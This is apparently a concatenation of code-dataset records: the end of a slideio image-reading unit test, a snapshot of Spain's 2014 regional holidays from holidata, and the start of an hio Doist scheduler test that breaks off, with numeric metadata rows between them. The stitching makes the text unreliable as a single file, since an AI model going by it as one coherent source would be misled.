self.assertTrue(scene is not None)
self.assertEqual(image_path, scene.file_path)
self.assertEqual(1, scene.num_channels)
scene_rect = scene.rect
self.assertEqual(0, scene_rect[0])
self.assertEqual(0, scene_rect[1])
self.assertEqual(2448, scene_rect[2])
self.assertEqual(2448, scene_rect[3])
for channel_index in range(scene.num_channels):
channel_type = scene.get_channel_data_type(channel_index)
self.assertEqual(channel_type, np.uint8)
compression = scene.compression
self.assertEqual(compression, slideio.Compression.Png)
res = scene.resolution
self.assertEqual(0, res[0])
self.assertEqual(0, res[1])
def test_3chnl_png16b_metadata(self):
"""Opens 3 channel 16 bit png file and checks metadata."""
image_path = get_test_image_path(
"gdal",
"img_2448x2448_3x16bit_SRC_RGB_ducks.png"
)
slide = slideio.open_slide(image_path, "GDAL")
self.assertTrue(slide is not None)
num_scenes = slide.num_scenes
self.assertEqual(num_scenes, 1)
self.assertEqual(image_path, slide.file_path)
scene = slide.get_scene(0)
self.assertTrue(scene is not None)
self.assertEqual(image_path, scene.file_path)
self.assertEqual(3, scene.num_channels)
scene_rect = scene.rect
self.assertEqual(0, scene_rect[0])
self.assertEqual(0, scene_rect[1])
self.assertEqual(2448, scene_rect[2])
self.assertEqual(2448, scene_rect[3])
for channel_index in range(scene.num_channels):
channel_type = scene.get_channel_data_type(channel_index)
self.assertEqual(channel_type, np.uint16)
compression = scene.compression
self.assertEqual(compression, slideio.Compression.Png)
res = scene.resolution
self.assertEqual(0, res[0])
self.assertEqual(0, res[1])
def test_3chnl_jpeg_metadata(self):
"""Opens 3 channel jpeg file and checks metadata."""
image_path = get_test_image_path(
"gdal",
"Airbus_Pleiades_50cm_8bit_RGB_Yogyakarta.jpg"
)
slide = slideio.open_slide(image_path, "GDAL")
self.assertTrue(slide is not None)
num_scenes = slide.num_scenes
self.assertEqual(num_scenes, 1)
self.assertEqual(image_path, slide.file_path)
scene = slide.get_scene(0)
self.assertTrue(scene is not None)
self.assertEqual(image_path, scene.file_path)
self.assertEqual(3, scene.num_channels)
scene_rect = scene.rect
self.assertEqual(0, scene_rect[0])
self.assertEqual(0, scene_rect[1])
self.assertEqual(5494, scene_rect[2])
self.assertEqual(5839, scene_rect[3])
for channel_index in range(scene.num_channels):
channel_type = scene.get_channel_data_type(channel_index)
self.assertEqual(channel_type, np.uint8)
compression = scene.compression
self.assertEqual(compression, slideio.Compression.Jpeg)
res = scene.resolution
self.assertEqual(0, res[0])
self.assertEqual(0, res[1])
def test_readblock_png8bit(self):
"""
8 bit png image.
Reads 8b png images and checks the raster.
by calculation of raster statistics for
specific rectangles
"""
image_path = get_test_image_path(
"gdal",
"img_1024x600_3x8bit_RGB_color_bars_CMYKWRGB.png"
)
slide = slideio.open_slide(image_path, "GDAL")
self.assertTrue(slide is not None)
scene = slide.get_scene(0)
block_rect = (260, 500, 100, 100)
# read 3 channel block
raster = scene.read_block(block_rect)
mean, stddev = cv.meanStdDev(raster)
self.assertEqual(mean[0], 255)
self.assertEqual(stddev[0], 0)
self.assertEqual(mean[1], 255)
self.assertEqual(stddev[1], 0)
self.assertEqual(mean[2], 0)
self.assertEqual(stddev[2], 0)
# read one channel block
raster = scene.read_block(block_rect, channel_indices=[1])
mean, stddev = cv.meanStdDev(raster)
self.assertEqual(mean[0], 255)
self.assertEqual(stddev[0], 0)
def test_resampling_block_png8bit(self):
"""
Resampling of a png image.
Reads and resamples 8b png images and checks the raster.
by calculation of raster statistics for
specific rectangles
"""
image_path = get_test_image_path(
"gdal",
"img_1024x600_3x8bit_RGB_color_bars_CMYKWRGB.png"
)
slide = slideio.open_slide(image_path, "GDAL")
self.assertTrue(slide is not None)
scene = slide.get_scene(0)
block_rect = (260, 500, 100, 100)
block_size = (12, 12)
# read 3 channel block
raster = scene.read_block(block_rect, size=block_size)
mean, stddev = cv.meanStdDev(raster)
self.assertEqual(mean[0], 255)
self.assertEqual(stddev[0], 0)
self.assertEqual(mean[1], 255)
self.assertEqual(stddev[1], 0)
self.assertEqual(mean[2], 0)
self.assertEqual(stddev[2], 0)
# read one channel block
raster = scene.read_block(
block_rect,
size=block_size,
channel_indices=[1]
)
mean, stddev = cv.meanStdDev(raster)
self.assertEqual(mean[0], 255)
self.assertEqual(stddev[0], 0)
def test_readblock_png8bit_with(self):
"""
8 bit png image.
Reads 8b png images and checks the raster.
by calculation of raster statistics for
specific rectangles
"""
image_path = get_test_image_path(
"gdal",
"img_1024x600_3x8bit_RGB_color_bars_CMYKWRGB.png"
)
with slideio.open_slide(image_path, "GDAL") as slide:
self.assertTrue(slide is not None)
with slide.get_scene(0) as scene:
block_rect = (260, 500, 100, 100)
# read 3 channel block
raster = scene.read_block(block_rect)
mean, stddev = cv.meanStdDev(raster)
self.assertEqual(mean[0], 255)
self.assertEqual(stddev[0], 0)
self.assertEqual(mean[1], 255)
self.assertEqual(stddev[1], 0)
self.assertEqual(mean[2], 0)
self.assertEqual(stddev[2], 0)
# read one channel block
raster = scene.read_block(block_rect, channel_indices=[1])
mean, stddev = cv.meanStdDev(raster)
self.assertEqual(mean[0], 255)
self.assertEqual(stddev[0], 0)
if __name__ == '__main__':
unittest.main()
| 38.194215 | 74 | 0.620361 | 1,129 | 9,243 | 4.875111 | 0.115146 | 0.196221 | 0.049419 | 0.039244 | 0.890625 | 0.867914 | 0.852289 | 0.852289 | 0.852289 | 0.852289 | 0 | 0.043327 | 0.285838 | 9,243 | 241 | 75 | 38.352697 | 0.790486 | 0.097155 | 0 | 0.761905 | 0 | 0 | 0.047361 | 0.037028 | 0 | 0 | 0 | 0 | 0.439153 | 1 | 0.042328 | false | 0 | 0.031746 | 0 | 0.079365 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6a50a187877409ff3c0388756f713a8f4a9edc1d | 12,382 | py | Python | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2014] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 32 | 2019-04-12T08:01:34.000Z | 2022-02-28T04:41:50.000Z | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2014] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 74 | 2019-07-09T16:35:20.000Z | 2022-03-09T16:41:34.000Z | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2014] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 20 | 2019-01-28T07:41:02.000Z | 2022-02-16T02:38:57.000Z | [
{
'date': '2014-01-01',
'description': 'Año Nuevo',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2014-01-06',
'description': 'Epifanía del Señor',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2014-02-28',
'description': 'Día de Andalucía',
'locale': 'es-ES',
'notes': '',
'region': 'AN',
'type': 'F'
},
{
'date': '2014-03-01',
'description': 'Día de las Illes Balears',
'locale': 'es-ES',
'notes': '',
'region': 'IB',
'type': 'F'
},
{
'date': '2014-03-19',
'description': 'San José',
'locale': 'es-ES',
'notes': '',
'region': 'MC',
'type': 'RF'
},
{
'date': '2014-03-19',
'description': 'San José',
'locale': 'es-ES',
'notes': '',
'region': 'ML',
'type': 'RF'
},
{
'date': '2014-03-19',
'description': 'San José',
'locale': 'es-ES',
'notes': '',
'region': 'NC',
'type': 'RF'
},
{
'date': '2014-03-19',
'description': 'San José',
'locale': 'es-ES',
'notes': '',
'region': 'VC',
'type': 'RF'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'AN',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'AR',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'AS',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'CB',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'CE',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'CL',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'CM',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'CN',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'EX',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'GA',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'IB',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'MC',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'MD',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'ML',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'NC',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'PV',
'type': 'RV'
},
{
'date': '2014-04-17',
'description': 'Jueves Santo',
'locale': 'es-ES',
'notes': '',
'region': 'RI',
'type': 'RV'
},
{
'date': '2014-04-18',
'description': 'Viernes Santo',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2014-04-20',
'description': 'Pascua',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'CM',
'type': 'RV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'CT',
'type': 'RV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'NC',
'type': 'RV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'PV',
'type': 'RV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'RI',
'type': 'RV'
},
{
'date': '2014-04-21',
'description': 'Lunes de Pascua',
'locale': 'es-ES',
'notes': '',
'region': 'VC',
'type': 'RV'
},
{
'date': '2014-04-23',
'description': 'Fiesta de Castilla y León',
'locale': 'es-ES',
'notes': '',
'region': 'CL',
'type': 'F'
},
{
'date': '2014-04-23',
'description': 'San Jorge / Día de Aragón',
'locale': 'es-ES',
'notes': '',
'region': 'AR',
'type': 'RF'
},
{
'date': '2014-05-01',
'description': 'Fiesta del Trabajo',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2014-05-02',
'description': 'Fiesta de la Comunidad de Madrid',
'locale': 'es-ES',
'notes': '',
'region': 'MD',
'type': 'F'
},
{
'date': '2014-05-17',
'description': 'Día de las Letras Gallegas',
'locale': 'es-ES',
'notes': '',
'region': 'GA',
'type': 'F'
},
{
'date': '2014-05-30',
'description': 'Día de Canarias',
'locale': 'es-ES',
'notes': '',
'region': 'CN',
'type': 'F'
},
{
'date': '2014-06-09',
'description': 'Día de la Región de Murcia',
'locale': 'es-ES',
'notes': '',
'region': 'MC',
'type': 'F'
},
{
'date': '2014-06-09',
'description': 'Día de La Rioja',
'locale': 'es-ES',
'notes': '',
'region': 'RI',
'type': 'F'
},
{
'date': '2014-06-19',
'description': 'Corpus Christi',
'locale': 'es-ES',
'notes': '',
'region': 'CM',
'type': 'RV'
},
{
'date': '2014-06-19',
'description': 'Corpus Christi',
'locale': 'es-ES',
'notes': '',
'region': 'MD',
'type': 'RV'
},
{
'date': '2014-06-24',
'description': 'San Juan',
'locale': 'es-ES',
'notes': '',
'region': 'CT',
'type': 'RF'
},
{
'date': '2014-07-25',
'description': 'Santiago Apóstol',
'locale': 'es-ES',
'notes': '',
'region': 'CB',
'type': 'RF'
},
{
'date': '2014-07-25',
'description': 'Santiago Apóstol / Día Nacional de Galicia',
'locale': 'es-ES',
'notes': '',
'region': 'GA',
'type': 'RF'
},
{
'date': '2014-08-15',
'description': 'Asunción de la Virgen',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2014-09-08',
'description': 'Día de Asturias',
'locale': 'es-ES',
'notes': '',
'region': 'AS',
'type': 'F'
},
{
'date': '2014-09-08',
'description': 'Día de Extremadura',
'locale': 'es-ES',
'notes': '',
'region': 'EX',
'type': 'F'
},
{
'date': '2014-09-11',
'description': 'Fiesta Nacional de Cataluña',
'locale': 'es-ES',
'notes': '',
'region': 'CT',
'type': 'F'
},
{
'date': '2014-09-15',
'description': 'La Bien Aparecida',
'locale': 'es-ES',
'notes': '',
'region': 'CB',
'type': 'RF'
},
{
'date': '2014-10-04',
'description': 'Fiesta del Sacrificio (Aid El Kebir)',
'locale': 'es-ES',
'notes': '',
'region': 'ML',
'type': 'RV'
},
{
'date': '2014-10-06',
'description': 'Fiesta del Sacrificio (Eidul Adha)',
'locale': 'es-ES',
'notes': '',
'region': 'CE',
'type': 'RV'
},
{
'date': '2014-10-09',
'description': 'Día de la Comunitat Valenciana',
'locale': 'es-ES',
'notes': '',
'region': 'VC',
'type': 'F'
},
{
'date': '2014-10-12',
'description': 'Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'AN',
'type': 'F'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'AR',
'type': 'F'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'AS',
'type': 'F'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'CE',
'type': 'F'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'CL',
'type': 'F'
},
{
'date': '2014-10-13',
'description': 'Lunes siguiente a la Fiesta Nacional de España',
'locale': 'es-ES',
'notes': '',
'region': 'EX',
'type': 'F'
},
{
'date': '2014-10-25',
'description': 'Día del País Vasco-Euskadiko Eguna',
'locale': 'es-ES',
'notes': '',
'region': 'PV',
'type': 'F'
},
{
'date': '2014-11-01',
'description': 'Todos los Santos',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2014-12-06',
'description': 'Día de la Constitución Española',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2014-12-08',
'description': 'Inmaculada Concepción',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2014-12-25',
'description': 'Natividad del Señor',
'locale': 'es-ES',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2014-12-26',
'description': 'San Esteban',
'locale': 'es-ES',
'notes': '',
'region': 'CT',
'type': 'RF'
},
{
'date': '2014-12-26',
'description': 'San Esteban',
'locale': 'es-ES',
'notes': '',
'region': 'IB',
'type': 'RF'
}
] | 22.677656 | 72 | 0.37611 | 1,108 | 12,382 | 4.203069 | 0.117329 | 0.116813 | 0.146017 | 0.219025 | 0.824565 | 0.799227 | 0.796865 | 0.715482 | 0.715482 | 0.661799 | 0 | 0.072991 | 0.398078 | 12,382 | 546 | 73 | 22.677656 | 0.551858 | 0 | 0 | 0.648352 | 0 | 0 | 0.406687 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6a6a33919b929b4945f15a86c5c36d5d5ee13505 | 37,061 | py | Python | tests/base/test_doist.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 1 | 2021-04-07T19:10:28.000Z | 2021-04-07T19:10:28.000Z | tests/base/test_doist.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 4 | 2021-03-30T20:50:19.000Z | 2022-01-06T17:16:18.000Z | tests/base/test_doist.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 3 | 2021-04-08T19:35:36.000Z | 2021-06-03T13:39:05.000Z | # -*- encoding: utf-8 -*-
"""
tests.core.test_cycling module
"""
import pytest
import inspect
from hio.base import doing
from hio.base.basing import State
from hio.base.doing import TryDoer, tryDo
def test_doist():
"""
Test basic doist
"""
doist = doing.Doist()
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == 0.03125
assert doist.real == False
assert doist.limit == None
assert doist.doers == []
assert doist.timer.duration == doist.tock
doist.do() # defaults make sure no exceptions
"""End Test """
def test_doist_once():
"""
Test doist.once with deeds
"""
doist = doing.Doist(tock=0.25)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == 0.25
assert doist.real == False
assert doist.limit == None
assert doist.doers == []
doer0 = doing.ExDoer(tock=0.25, tymth=doist.tymen())
doer1 = doing.ExDoer(tock=0.5, tymth=doist.tymen())
doers = [doer0, doer1]
doist.doers = doers
doist.enter()
assert len(doist.deeds) == 2
assert [val[1] for val in doist.deeds] == [0.0, 0.0]
for doer in doers:
assert doer.states == [State(tyme=0.0, context='enter', feed=0.0, count=0)]
assert doer.done == False
doist.recur()
assert doist.tyme == 0.25 # on next cycle
assert len(doist.deeds) == 2
assert [val[1] for val in doist.deeds] == [0.25, 0.5]
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1)]
assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1)]
doist.recur()
assert doist.tyme == 0.5 # on next cycle
assert len(doist.deeds) == 2
assert [val[1] for val in doist.deeds] == [0.5, 0.5]
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.25, context='recur', feed=0.25, count=2)]
assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1)]
doist.recur()
assert doist.tyme == 0.75 # on next cycle
assert len(doist.deeds) == 2
assert [val[1] for val in doist.deeds] == [0.75, 1.0]
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.25, context='recur', feed=0.25, count=2),
State(tyme=0.5, context='recur', feed=0.5, count=3)]
assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.5, context='recur', feed=0.5, count=2)]
doist.recur()
assert doist.tyme == 1.0 # on next cycle
assert len(doist.deeds) == 1
assert [val[1] for val in doist.deeds] == [1.0]
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.25, context='recur', feed=0.25, count=2),
State(tyme=0.5, context='recur', feed=0.5, count=3),
State(tyme=0.75, context='recur', feed=0.75, count=4),
State(tyme=0.75, context='exit', feed=None, count=5)]
assert doer0.done == True
assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.5, context='recur', feed=0.5, count=2)]
doist.recur()
assert doist.tyme == 1.25 # on next cycle
assert len(doist.deeds) == 1
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.25, context='recur', feed=0.25, count=2),
State(tyme=0.5, context='recur', feed=0.5, count=3),
State(tyme=0.75, context='recur', feed=0.75, count=4),
State(tyme=0.75, context='exit', feed=None, count=5)]
assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.5, context='recur', feed=0.5, count=2),
State(tyme=1.0, context='recur', feed=1.0, count=3)]
doist.recur()
assert doist.tyme == 1.50 # on next cycle
assert len(doist.deeds) == 1
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.25, context='recur', feed=0.25, count=2),
State(tyme=0.5, context='recur', feed=0.5, count=3),
State(tyme=0.75, context='recur', feed=0.75, count=4),
State(tyme=0.75, context='exit', feed=None, count=5)]
assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.5, context='recur', feed=0.5, count=2),
State(tyme=1.0, context='recur', feed=1.0, count=3)]
doist.recur()
assert doist.tyme == 1.75 # on next cycle
assert len(doist.deeds) == 0
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.25, context='recur', feed=0.25, count=2),
State(tyme=0.5, context='recur', feed=0.5, count=3),
State(tyme=0.75, context='recur', feed=0.75, count=4),
State(tyme=0.75, context='exit', feed=None, count=5)]
assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.5, context='recur', feed=0.5, count=2),
State(tyme=1.0, context='recur', feed=1.0, count=3),
State(tyme=1.5, context='recur', feed=1.5, count=4),
State(tyme=1.5, context='exit', feed=None, count=5)]
assert doer1.done == True
"""End Test """
def test_doist_doers():
"""
Test doist.do with .close of deeds
"""
tock = 0.03125
doist = doing.Doist(tock=tock)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == False
assert doist.limit == None
assert doist.doers == []
doer0 = doing.ExDoer(tock=tock, tymth=doist.tymen())
doer1 = doing.ExDoer(tock=tock*2, tymth=doist.tymen())
assert doer0.tock == tock
assert doer1.tock == tock * 2
doers = [doer0, doer1]
for doer in doers:
assert doer.states == []
assert doer.count == None
assert doer.done == None
ticks = 4
limit = tock * ticks
doist.do(doers=doers, limit=limit)
assert doist.tyme == limit == 0.125
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='recur', feed=0.0625, count=3),
State(tyme=0.09375, context='recur', feed=0.09375, count=4),
State(tyme=0.09375, context='exit', feed=None, count=5)]
assert doer0.done == True
assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.0625, context='recur', feed=0.0625, count=2),
State(tyme=0.125, context='close', feed=None, count=3),
State(tyme=0.125, context='exit', feed=None, count=4)]
assert doer1.done == False
doist = doing.Doist(tock=tock, real=True, limit=limit)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == True
assert doist.limit == limit == 0.125
assert doist.doers == []
for doer in doers:
doer.states = []
assert doer.states == []
doist.do(doers=doers)
assert doist.tyme == limit == 0.125
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='recur', feed=0.0625, count=3),
State(tyme=0.09375, context='recur', feed=0.09375, count=4),
State(tyme=0.09375, context='exit', feed=None, count=5)]
assert doer0.done == True
assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.0625, context='recur', feed=0.0625, count=2),
State(tyme=0.125, context='close', feed=None, count=3),
State(tyme=0.125, context='exit', feed=None, count=4)]
assert doer1.done == False
# doers passed to Doist init
doist = doing.Doist(tock=tock, real=True, limit=limit, doers=doers)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == True
assert doist.limit == limit == 0.125
assert doist.doers == doers
for doer in doers:
doer.states = []
assert doer.states == []
doist.do()
assert doist.tyme == limit == 0.125
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='recur', feed=0.0625, count=3),
State(tyme=0.09375, context='recur', feed=0.09375, count=4),
State(tyme=0.09375, context='exit', feed=None, count=5)]
assert doer0.done == True
assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.0625, context='recur', feed=0.0625, count=2),
State(tyme=0.125, context='close', feed=None, count=3),
State(tyme=0.125, context='exit', feed=None, count=4)]
assert doer1.done == False
# Run ASAP
doist = doing.Doist(tock=tock, real=False, limit=limit)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == False
assert doist.limit == limit == 0.125
assert doist.doers == []
for doer in doers:
doer.states = []
assert doer.states == []
doer.tock = 0.0 # run asap
assert doer.tock == 0.0
doist.do(doers=doers)
assert doist.tyme == limit
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='recur', feed=0.0625, count=3),
State(tyme=0.09375, context='recur', feed=0.09375, count=4),
State(tyme=0.09375, context='exit', feed=None, count=5)]
assert doer0.done == doer1.done == True
assert doer1.states == doer0.states
doist = doing.Doist(tock=tock, real=True, limit=limit)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == True
assert doist.limit == limit == 0.125
assert doist.doers == []
for doer in doers:
doer.states = []
assert doer.states == []
doer.tock = 0.0 # run asap
assert doer.tock == 0.0
doist.do(doers=doers)
assert doist.tyme == limit
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='recur', feed=0.0625, count=3),
State(tyme=0.09375, context='recur', feed=0.09375, count=4),
State(tyme=0.09375, context='exit', feed=None, count=5)]
assert doer0.done == doer1.done == True
assert doer1.states == doer0.states
# Low limit force close
ticks = 2
limit = tock * ticks
doist = doing.Doist(tock=tock, real=False, limit=limit)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == False
assert doist.limit == limit == 0.0625
assert doist.doers == []
for doer in doers:
doer.states = []
assert doer.states == []
doer.tock = 0.0 # run asap
assert doer.tock == 0.0
doist.do(doers=doers)
assert doist.tyme == limit
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='close', feed=None, count=3),
State(tyme=0.0625, context='exit', feed=None, count=4)]
assert doer0.done == doer1.done == False
assert doer1.states == doer0.states
# low limit force close real time
doist = doing.Doist(tock=tock, real=True, limit=limit)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == True
assert doist.limit == limit == 0.0625
assert doist.doers == []
for doer in doers:
doer.states = []
assert doer.states == []
doer.tock = 0.0 # run asap
assert doer.tock == 0.0
doist.do(doers=doers)
assert doist.tyme == limit
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='close', feed=None, count=3),
State(tyme=0.0625, context='exit', feed=None, count=4)]
assert doer0.done == doer1.done == False
assert doer1.states == doer0.states
"""End Test """
def test_extend_remove_doers():
"""
Test Doist but dynamically extend and remove doers
"""
tock = 1.0
limit = 5.0
# create some TryDoers for doers
doer0 = TryDoer(stop=1)
doer1 = TryDoer(stop=2)
doer2 = TryDoer(stop=3)
doers = [doer0, doer1, doer2]
doist = doing.Doist(tock=tock, limit=limit, doers=list(doers)) # make copy
assert doist.tock == tock == 1.0
assert doist.limit == limit == 5.0
assert doist.done is None
assert doist.doers == doers
assert not doist.deeds
doist.do(limit=2)
assert doist.tyme == 2.0
